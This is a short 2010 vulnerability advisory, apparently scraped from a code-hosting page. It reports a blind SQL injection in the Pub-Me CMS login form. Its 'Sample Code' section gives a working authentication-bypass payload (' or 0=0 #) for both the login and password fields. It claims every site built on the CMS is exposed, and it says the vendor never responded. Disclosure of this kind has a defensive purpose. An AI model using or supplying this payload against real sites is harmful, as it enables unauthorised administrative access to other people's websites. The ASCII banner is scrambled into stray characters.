58 lines
No EOL
1.3 KiB
Text
58 lines
No EOL
1.3 KiB
Text
_______ _____ ___
|
|
| | | | |.' _|
|
|
| |__ | _|
|
|
|___|___| |__||__|
|
|
|
|
Pub-Me CMS Blind SQL Injection Vulnerability
|
|
|
|
Name: Pub-Me CMS
|
|
Vendor: http://www.pub-me.com/
|
|
Versions Affected: //unknown, all current affected - devel. homepage & 33 clients web pages
|
|
Software Link: Not aviable, Demo can be requested by e-mail from vendor
|
|
Found by: H4f, <Sec was born project, Anonymous submission>
|
|
Contact: zotrob [at] gmail [dot] com
|
|
Date: 2010-10-25
|
|
|
|
X. INDEX
|
|
|
|
I. ABOUT THE APPLICATION
|
|
II. DESCRIPTION
|
|
III. ANALYSIS
|
|
IV. SAMPLE CODE
|
|
V. FIX
|
|
|
|
|
|
I. ABOUT THE APPLICATION
|
|
________________________
|
|
|
|
Pub-Me Content Managment System is designed to make it possible for you to pay full
|
|
attention to the content without having to bother about technologies.
|
|
|
|
II. DESCRIPTION
|
|
_______________
|
|
|
|
NOT properly sanitised form before being used
|
|
in a SQL query.
|
|
|
|
|
|
III. ANALYSIS
|
|
_____________
|
|
|
|
Summary:
|
|
|
|
All Pub-Me based websites are vulnerable, any more/less trained monkey can reach admin panel.
|
|
______________________
|
|
|
|
|
|
IV. SAMPLE CODE
|
|
_______________
|
|
|
|
Blind SQL Injection
|
|
|
|
Login> ' or 0=0 #
|
|
Pass> ' or 0=0 #
|
|
|
|
V. FIX
|
|
______
|
|
|
|
Vedor contacted, no reponse. |